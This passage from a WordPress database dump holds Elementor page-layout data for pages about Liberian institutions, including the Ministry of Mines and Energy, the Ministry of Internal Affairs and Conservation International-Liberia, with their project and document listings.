page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8581,1604,'_dp_original','1602'),(8582,1604,'_edit_last','42'),(8584,1606,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8585,1606,'slide_template','default'),(8587,1606,'_elementor_template_type','wp-post'),(8588,1606,'_elementor_version','2.7.5'),(8589,1606,'_wp_page_template','default'),(8590,1606,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6ba7389\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LiMA coming soon!<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5cce3400\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"18267993\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"37219f1f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ab5334\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"lima\\\",\\\"tag_id\\\":\\\"58\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"lima\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"55f0c58f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"126f7a36\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"41e8be5a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1f1d95fa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:lima\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8592,1606,'_dp_original','1604'),(8593,1606,'_edit_last','42'),(8595,1608,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8596,1608,'slide_template','default'),(8598,1608,'_elementor_template_type','wp-post'),(8599,1608,'_elementor_version','2.7.5'),(8600,1608,'_wp_page_template','default'),(8601,1608,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.<\\/p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 \\u2013 2015) program that was signed in 2010.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mme\\\",\\\"tag_id\\\":\\\"60\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mme\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53f2292\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1eff497\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f481ee\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mme\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8602,1608,'_dp_original','1606'),(8603,1608,'_edit_last','42'),(8606,1610,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8607,1610,'slide_template','default'),(8609,1610,'_elementor_template_type','wp-post'),(8610,1610,'_elementor_version','2.7.5'),(8611,1610,'_wp_page_template','default'),(8612,1610,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"644e2d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The MIA\'s responsibility is to administer Local Governance which basically involved Collection of Taxes, Maintenance of Peace and Tranquility, and Seeking the Welfare of the People. The MIA have undertaken some projects directly on government funding, while others are funded by development partners, including roads and bridges projects; local administrative buildings; commissioners\\u2019 residences; schools; clinics markets; peace huts; latrines; wells; etc.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3cd232e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"58747a71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4bd205e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b1b1970\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mia\\\",\\\"tag_id\\\":\\\"59\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mia\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"177453a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"182afa84\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"375dd5cc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"78a5b2a8\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mia\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8613,1610,'_dp_original','1608'),(8614,1610,'_edit_last','42'),(8617,1612,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8618,1612,'slide_template','default'),(8620,1612,'_elementor_template_type','wp-post'),(8621,1612,'_elementor_version','2.7.5'),(8622,1612,'_wp_page_template','default'),(8623,1612,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23bf9b5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.<\\/p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI\\u2019s reach is truly global.<\\/p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a2232e5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"11bbe920\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3a1852cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"45f11703\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ci\\\",\\\"tag_id\\\":\\\"50\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ci\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2db389f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3054dac6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"21e7308e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"331470f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ci\\\" 